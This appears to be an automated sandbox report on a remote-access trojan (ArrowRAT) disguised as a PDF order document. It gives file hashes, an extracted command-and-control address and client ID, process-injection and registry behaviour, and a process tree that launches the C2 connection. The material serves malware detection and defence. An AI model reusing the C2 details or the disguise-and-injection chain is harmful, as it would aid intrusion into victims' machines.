Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14-10-2023 03:13
Static task
static1
Behavioral task
behavioral1
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win10v2004-20230915-en
General
-
Target
MOQ_T7FIBA00541·PDF .scr
-
Size
670KB
-
MD5
48a5e2b45923213e94a82d30db1eb988
-
SHA1
eb3c3aeb61e6e20b149cbd966f60c81a8215e8b0
-
SHA256
19fa9896468d7dd79d76fa27b34f66e13b6c5268cdd574c0a78eeb0e3dbeb839
-
SHA512
13edc7b141a8bd854a07ec70371f6fe59055d1dfe4127e3912992181d983e710f990d0cfcaa294e5da8e37ab757efb93133382625e210c47823885586fc536da
-
SSDEEP
12288:PBzhfOS3GXJNUwCpoOekXOS6zjwehALsCGlhcBd:phfOS3sJWwvOeYCras
Malware Config
Extracted
arrowrat
Client
192.159.99.3:1337
qawNWRCCU
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1956 set thread context of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 2564 set thread context of 580 2564 aspnet_compiler.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2552 ipconfig.exe 2496 ipconfig.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2564 aspnet_compiler.exe 2564 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2564 aspnet_compiler.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe Token: SeShutdownPrivilege 1744 explorer.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe 1744 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2564 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 1956 wrote to memory of 2704 1956 MOQ_T7FIBA00541·PDF .scr 28 PID 1956 wrote to memory of 2704 1956 MOQ_T7FIBA00541·PDF .scr 28 PID 1956 wrote to memory of 2704 1956 MOQ_T7FIBA00541·PDF .scr 28 PID 1956 wrote to memory of 2704 1956 MOQ_T7FIBA00541·PDF .scr 28 PID 2704 wrote to memory of 2552 2704 cmd.exe 30 PID 2704 wrote to memory of 2552 2704 cmd.exe 30 PID 2704 wrote to memory of 2552 2704 cmd.exe 30 PID 2704 wrote to memory of 2552 2704 cmd.exe 30 PID 1956 wrote to memory of 2452 1956 MOQ_T7FIBA00541·PDF .scr 33 PID 1956 wrote to memory of 2452 1956 MOQ_T7FIBA00541·PDF .scr 33 PID 1956 wrote to memory of 2452 1956 MOQ_T7FIBA00541·PDF .scr 33 PID 1956 wrote to memory of 2452 1956 MOQ_T7FIBA00541·PDF .scr 33 PID 2452 wrote to memory of 2496 2452 cmd.exe 35 PID 2452 wrote to memory of 2496 2452 cmd.exe 35 PID 2452 wrote to memory of 2496 2452 cmd.exe 35 PID 2452 wrote to memory of 2496 2452 cmd.exe 35 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 1956 wrote to memory of 2564 1956 MOQ_T7FIBA00541·PDF .scr 36 PID 2564 wrote to memory of 1744 2564 aspnet_compiler.exe 37 PID 2564 wrote to memory of 1744 2564 aspnet_compiler.exe 37 PID 2564 wrote to memory of 1744 2564 aspnet_compiler.exe 37 PID 2564 wrote to memory of 1744 2564 aspnet_compiler.exe 37 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 2564 wrote to memory of 580 2564 aspnet_compiler.exe 38 PID 1744 wrote to memory of 2764 1744 explorer.exe 39 PID 1744 wrote to memory of 2764 1744 explorer.exe 39 PID 1744 wrote to memory of 2764 1744 explorer.exe 39 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MOQ_T7FIBA00541·PDF .scr"C:\Users\Admin\AppData\Local\Temp\MOQ_T7FIBA00541·PDF .scr" /S1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:2496
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:2764
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 192.159.99.3 1337 qawNWRCCU3⤵PID:580
-
-